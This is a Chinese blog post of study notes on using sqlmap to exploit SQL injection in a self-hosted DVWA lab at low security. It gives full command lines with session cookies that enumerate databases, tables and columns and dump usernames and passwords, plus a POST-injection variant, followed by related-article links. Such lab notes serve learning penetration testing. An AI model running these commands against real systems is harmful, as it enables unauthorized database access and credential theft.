sqlmap+DVWA渗透笔记(low)

最新推荐文章于 2024-03-27 14:35:55 发布
最新推荐文章于 2024-03-27 14:35:55 发布
阅读量208 收藏
点赞数
文章标签: 数据库 python 运维
原文链接:http://www.cnblogs.com/panpanblog/p/8950101.html
版权

    学习使用sqlmap,自己搭建了虚拟机环境,利用DVWA网站进行了最简单的注入,如下是自己的学习笔记。

1.尝试注入

sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#"

发现跳转到login页面,说明需要Cookie维持会话

2.加入cookie尝试

sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767"

3.爆出数据库类型

 

4.爆数据库名

sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767" --dbs

结果:

5.爆表名

sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767"   -D dvwa --tables

结果:

6.爆列名

sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767"   -D dvwa -T users --columns

结果:

7.爆字段

sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767"   -D dvwa -T users -C user,password --dump

结果:

补充:

  如果是POST注入的话,我们只需要用抓包工具(如burpsuite)抓包,然后将包内容复制到一个.txt文本中,使用如下命令进行注入:

sqlmap.py -r "path\post.txt" -p n  

-r :后接txt文件的路径

-p:指定存在注入的参数n

其他就和get注入一样。

转载于:https://www.cnblogs.com/panpanblog/p/8950101.html

anganzhao9636
关注
[红日安全]学习笔记1—SQL注入实战攻防(SQLMapDVWA、Pikachu)
ISNS的博客
04-21 1560
最近和同学聊天: 是我太菜。
Dvwa之SQL盲注全级别学习笔记
Mbys_Lettuce的博客
09-19 1347
注入的同时观察页面返回信息,输入1' and (length(database()))=猜测的数据库长度,返回信息为User ID exists in the database则证明该数据库长度为猜测的长度。可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti。因为有两个数值,且ASCII中97到122为小写字母的范围,所以把x的范围为1~4,y的范围为97~122。
自学渗透测试:使用 DVWASQLmap 探寻 SQL 注入攻击与防范
weixin_43263566的博客
01-04 2628
SQL注入漏洞
sqlmap自动化漏洞利用(DVWA初、中、高)
qq_42620328的博客
10-14 7384
sqlmap自动化漏洞利用(DVWA
网络渗透测试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 2036
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
渗透测试】|sqlmap工具注入-基于dvwa的sql injection
yangdan_jiayou的博客
03-27 674
这个检测结果表明系统对联合查询的处理方式存在漏洞,可以通过联合查询来获取额外的信息或执行其他操作。这个检测结果表明系统对错误消息的处理方式存在漏洞,可以通过错误消息来推断数据库的结构或内容,从而进行注入攻击。这个payload试图通过在查询中嵌入一个时间延迟函数来验证注入点的存在,如果系统在执行这个查询时发生了延迟,那么说明注入点存在,攻击者可以进一步利用这个注入点执行其他操作。这个payload尝试通过在查询中嵌入一个错误,然后通过错误消息中的内容来获取敏感信息或执行其他恶意操作。
SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
tmzy1的博客
03-19 6100
SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
SQLmap注入学习实战 —— dvwalow到impossble
qq_40476955的博客
01-10 6269
大晚上失眠了于是来写博客 你为啥这么勤奋 白天玩了手动注入,结果发现sql注入的难度给我自动设置成impossible了。每次都要改包,可能这是dvwa在win下的bug吧,虽说不致命,却有些许麻烦。 low级别注入 经过试验发现,medium和high其实都可以这么玩 你SQLMAP真强大 爆破库名 由于DVWA的注入是 GET类型的 详细参照前面一篇笔记。 所以我们这
[笔记]渗透测试基础 - DVWA1.9
NEWU
11-02 661
暴力破解(Brute Force)演练low/medium:burpsuite方法重放穷举 high:python脚本构造数据包过token impossible: noway命令注入(Command injection)命令注入流程1.是否调用命令? 2.函数或函数的参数是否可控 3.是否拼接注入命令演练low: 127.0.0.1&&net user medium: 127.0.0.
sqlmap基础学习(笔记
部分学习记录
07-30 1259
此文为自己学习sqlmap基础的笔记,留个痕迹,便于以后复习查询 #sqlmap获取目标 python sqlmap --version python sqlmap -h python sqlmap -hh #sqlmap直连数据库 ##服务型数据库(MySQL、Oracle、Microsoft SQL Server、PostqreSQL etc) DBMS://USER:PASSWORD@DBMS_IP/PORT/DATABASE_NAME 例如:python sqlmap.py -d “mysql://
漏洞防范:搭建漏洞靶场DVWA,DVWA之SQL注入漏洞,利用sqlmap把复杂的程序自动化
weixin_52371314的博客
10-12 1937
sql注入漏洞
使用Sqlmap对目标站点进行渗透攻击
weixin_53897304的博客
06-13 1865
掌握Kali Linux中的Sqlmap各类功能及参数配置 技能目标:使用Sqlmap对目标站点进行渗透攻击
Sql注入之sqlmap+dvwa实例演练
听雨轩
10-27 951
Sql注入之sqlmap+dvwa实例演练   相信很多同学都已经知道了什么是sql注入,也明白为什么会发生sql注入。也可以通过在输入框和url中“手工”注入,来实现绕过登录、非法修改这样有趣又实用的功能。但这些还远不能让我们感觉到sql注入的巨大威力。 你也一定听过各种各样的新闻报道xxx网站被黑,上百万用户数据泄露。想知道它们是如何获得这些数据的吗?不讲过多原理,就和实验楼的【S...
利用DVWA学习sqlmap(1)
csu_vc的博客
07-17 8453
首先我们要在一台机器上配置dvwa环境下载地址 https://github.com/ethicalhack3r/DVWADVWA的源代码下载好之后,我们需要在受害机器上配置web服务,并配置dvwa 这里我使用的是phpstudy,因为它比较方便 把dvwa的源代码解压到phpstudy的www目录下,并到./config目录下修改配置文件把root和passwd修改为当前机器的数据库
使用SQLmapdvwa进行SQL注入测试
yusakul的博客
11-19 3274
SQLmap工具github链接:https://github.com/sqlmapproject/sqlmap 搭建dvwa环境并启动。 windows上需要搭建Python环境,下载sqlmap包并解压。。 设置dvwa级别为low(medium,high都可以,不要设成impossible就行) 打开dvwa的SQL Injection,打开浏览器调试,输入user id并submit...
一起学安全测试——用sqlmapdvwa实现SQL注入测试
热门推荐
灰蓝
03-29 1万+
sqlmap是一款进行SQL注入的工具,非常简单好用。我们在dvwa上试着用sqlmap实现注入,拿到数据库的信息。搭建dvwa环境并启动。 windows上需要搭建Python环境,下载sqlmap包并解压。kali linux自带(之后演示在kali上)。 设置dvwa级别为low(medium,high都可以,不要设成impossible就行) 打开dvwa的SQL Injection,打开浏
1、渗透之利用sqlmapdvwa进行sql注入
tzyyy1的博客
02-28 7183
测试环境:dvwa+Kail 1、寻找注入点:http://192.168.43.75/dvwa/vulnerabilities/sqli/ 1.2、注入点初步测试: 1' union select user, password from users# 1.3、继续测试:1'or'1'='1 2、使用Kail工具测试: sqlmap -u http://192.168.43....
Sqlmap 注入DVWA[low]
R4bbit
04-11 1080
0.dvwa要登陆才能访问到带有sql注入的页面,所以我们需要带有cookie注入 参数:--cookie="you cookie" 伪命令: sqlmap -u "http://www.sxxxx.com/1.php?id=111" --cookie="You cookie" 使用演示: 因为命令太长了,不方便看,我将参数以行间隔,真正使用的时候是不需要用行间隔的 sqlmap --url...
DVWA+SQLmap+Mysql注入实战
qq284489030的博客
02-22 463
实战         实战1:枚举登录MYSQL数据的用户名与密码         实战2:枚举所有数据库         实战3:枚举指定数据库的数据表         实战4:获取指定数据库和表中所有列的信息         实战5:枚举指定数据表中的所有用户名与密码          环境准备:        1)登录http://192.168.1.124/DVWA-1.9...
sqlmapdvwa
最新发布
06-14
当你使用SQLMapDVWA进行渗透测试时,你可以执行以下几个步骤: 1. **下载并安装**:首先,你需要从SQLMap的官方GitHub仓库下载最新版本,并按照指示安装在你的测试环境中。 2. **目标设置**:连接到DVWA的服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值